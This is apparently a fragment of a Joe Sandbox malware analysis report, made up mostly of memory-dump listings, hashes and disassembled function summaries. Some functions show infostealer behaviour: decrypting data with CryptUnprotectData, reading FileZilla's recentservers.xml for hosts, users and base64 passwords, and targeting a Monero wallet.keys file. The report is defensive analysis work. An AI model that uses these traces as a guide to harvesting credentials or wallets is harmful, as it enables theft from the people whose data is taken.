                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharCreateInstanceMultiWide
                  • String ID:
                  • API String ID: 123533781-0
                  • Opcode ID: 74870f4049422966abf5ad321e10f9b8430b129d676742b4400dd275094f0cca
                  • Instruction ID: ef5f2bb974dc3b180ddb08293ecb467e5682801f2bb910d0c2cfaa163fbbc652
                  • Opcode Fuzzy Hash: 74870f4049422966abf5ad321e10f9b8430b129d676742b4400dd275094f0cca
                  • Instruction Fuzzy Hash: 5841F870A40A289FDB24DB58CC94BDBB7B5BB48712F4091D8E608EB2D0D771AE85CF51
                  Function 009A9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 009A9B84
                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 009A9BA3
                  • LocalFree.KERNEL32(?), ref: 009A9BD3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Local$AllocCryptDataFreeUnprotect
                  • String ID:
                  • API String ID: 2068576380-0
                  • Opcode ID: c8a290a429c34aa7783cc5015f194ed77bdb72c0f6d6f1959a1383080a6400d4
                  • Instruction ID: b8299dfac1ca6832b6dd707afe87a48ac68fb3c651c043897cde445a3647ff6f
                  • Opcode Fuzzy Hash: c8a290a429c34aa7783cc5015f194ed77bdb72c0f6d6f1959a1383080a6400d4
                  • Instruction Fuzzy Hash: 0A11C9B8A00209EFDB04DF94D985AAEB7B9FF8D304F104598E915AB350D774AE50CFA1
                  Function 00E6D46F Relevance: .4, Instructions: 384COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2b0d9bc97df6fc37cb128a3d21480eb639d32ed2ffcc04f5e8ca940f417bddef
                  • Instruction ID: f8de8e6bd55933fd0bb2eec09ea4c911b0bf2da2cd4ec9a3042b15c168d86ffd
                  • Opcode Fuzzy Hash: 2b0d9bc97df6fc37cb128a3d21480eb639d32ed2ffcc04f5e8ca940f417bddef
                  • Instruction Fuzzy Hash: 72C198F3A082049FE7105E2CEC847ABB7E5EF94754F1A453EEAC4D3784E9766C058286
                  Function 00C0FF9A Relevance: .2, Instructions: 250COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: eeef595f966b4cd8d08afe5b2e45da83a2a9e1178fa003cc4a2c0e8dbda85ca7
                  • Instruction ID: 6b247b10a48c203b9c8a689f827464849702436e13c348492c91ee41aacfd7fd
                  • Opcode Fuzzy Hash: eeef595f966b4cd8d08afe5b2e45da83a2a9e1178fa003cc4a2c0e8dbda85ca7
                  • Instruction Fuzzy Hash: AB8126F3E083144BE3006E6DEC8436AFBD9EB94720F1B463DDE9893780E57A5D458686
                  Function 00CD8C55 Relevance: .2, Instructions: 206COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 330129fe6b01f8bd52121850f2759c9d7ada1082367ab3aa93a8757419f553a8
                  • Instruction ID: 639f766a02db16d718c35b03916fe1833979706a2e2647e05f3f69c92c90b1aa
                  • Opcode Fuzzy Hash: 330129fe6b01f8bd52121850f2759c9d7ada1082367ab3aa93a8757419f553a8
                  • Instruction Fuzzy Hash: 5951AEF3A282045BF708AE2CDD56777FBD5DB90320F1A463DEE89D3384E83959058285
                  Function 00C6AA1B Relevance: .2, Instructions: 185COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 675c6dbd281403c5bab80d03e0a4d61e9250d5be6402976e9e35dca7a2883698
                  • Instruction ID: ca76d6dddd628e36f84c4a29cb5f9024a0804d79bdf8a94cf85e0d88a0e116a1
                  • Opcode Fuzzy Hash: 675c6dbd281403c5bab80d03e0a4d61e9250d5be6402976e9e35dca7a2883698
                  • Instruction Fuzzy Hash: 57513AF391C6108BE3047E2DEC4666AFBE5EB94320F1A4A3DDAD5C7380FD3598548286
                  Function 00CC58B5 Relevance: .2, Instructions: 167COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8b91e3bb18efb5b8af14cafc30f4641966e92e1e471ff59e5c833e893b51d976
                  • Instruction ID: 0b40f7cb8a240d491c91cefdd3b5fcce1d55fbd0a15981ea6d1a0c951f7b6d0e
                  • Opcode Fuzzy Hash: 8b91e3bb18efb5b8af14cafc30f4641966e92e1e471ff59e5c833e893b51d976
                  • Instruction Fuzzy Hash: FD419FB3B082105FF314592DDC4976BB7DADBD4720F1A863DDA94C7B88DD79180182D5
                  Function 00CC084B Relevance: .2, Instructions: 153COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b903d4a83b99cb128d033daabbc6842358701c43781c4ea1d2ccf93fc56005c1
                  • Instruction ID: 01773033b627b91837898bd19943a59a6563c5439e52b9f17395f1bd04f66979
                  • Opcode Fuzzy Hash: b903d4a83b99cb128d033daabbc6842358701c43781c4ea1d2ccf93fc56005c1
                  • Instruction Fuzzy Hash: D44123B3F082041BF308A93AED857767687DBD4320F6AC23EAB68977C4EC7D48060195
                  Function 00C06CF6 Relevance: .0, Instructions: 44COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 57695e62cc377643f831ee60b4701ed86a3059a599bc69e5359ce62e59913e75
                  • Instruction ID: 8f38269f19f26f8515e08b50d788f180c4dd4d72b5c7727746fb2c95f1b3231e
                  • Opcode Fuzzy Hash: 57695e62cc377643f831ee60b4701ed86a3059a599bc69e5359ce62e59913e75
                  • Instruction Fuzzy Hash: EC1148B140830ECFEB159F14C4083AE73A0FF11725F12492AE9D1459D1DB771D98DE8A
                  Function 009B9750 Relevance: .0, Instructions: 15COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                  Function 009B0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                    • Part of subcall function 009B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 009B8E0B
                    • Part of subcall function 009BA920: lstrcpy.KERNEL32(00000000,?), ref: 009BA972
                    • Part of subcall function 009BA920: lstrcat.KERNEL32(00000000), ref: 009BA982
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                    • Part of subcall function 009BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009BA7E6
                    • Part of subcall function 009A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009A99EC
                    • Part of subcall function 009A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 009A9A11
                    • Part of subcall function 009A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 009A9A31
                    • Part of subcall function 009A99C0: ReadFile.KERNEL32(000000FF,?,00000000,009A148F,00000000), ref: 009A9A5A
                    • Part of subcall function 009A99C0: LocalFree.KERNEL32(009A148F), ref: 009A9A90
                    • Part of subcall function 009A99C0: CloseHandle.KERNEL32(000000FF), ref: 009A9A9A
                    • Part of subcall function 009B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 009B8E52
                  • GetProcessHeap.KERNEL32(00000000,000F423F,009C0DBA,009C0DB7,009C0DB6,009C0DB3), ref: 009B0362
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009B0369
                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 009B0385
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009C0DB2), ref: 009B0393
                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 009B03CF
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009C0DB2), ref: 009B03DD
                  • StrStrA.SHLWAPI(00000000,<User>), ref: 009B0419
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009C0DB2), ref: 009B0427
                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 009B0463
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009C0DB2), ref: 009B0475
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009C0DB2), ref: 009B0502
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009C0DB2), ref: 009B051A
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009C0DB2), ref: 009B0532
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009C0DB2), ref: 009B054A
                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 009B0562
                  • lstrcat.KERNEL32(?,profile: null), ref: 009B0571
                  • lstrcat.KERNEL32(?,url: ), ref: 009B0580
                  • lstrcat.KERNEL32(?,00000000), ref: 009B0593
                  • lstrcat.KERNEL32(?,009C1678), ref: 009B05A2
                  • lstrcat.KERNEL32(?,00000000), ref: 009B05B5
                  • lstrcat.KERNEL32(?,009C167C), ref: 009B05C4
                  • lstrcat.KERNEL32(?,login: ), ref: 009B05D3
                  • lstrcat.KERNEL32(?,00000000), ref: 009B05E6
                  • lstrcat.KERNEL32(?,009C1688), ref: 009B05F5
                  • lstrcat.KERNEL32(?,password: ), ref: 009B0604
                  • lstrcat.KERNEL32(?,00000000), ref: 009B0617
                  • lstrcat.KERNEL32(?,009C1698), ref: 009B0626
                  • lstrcat.KERNEL32(?,009C169C), ref: 009B0635
                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009C0DB2), ref: 009B068E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                  • API String ID: 1942843190-555421843
                  • Opcode ID: 26c2f9d3d03ae70480ca0caed7690a34bedf5fc1f157af2dd91d20a6888adf68
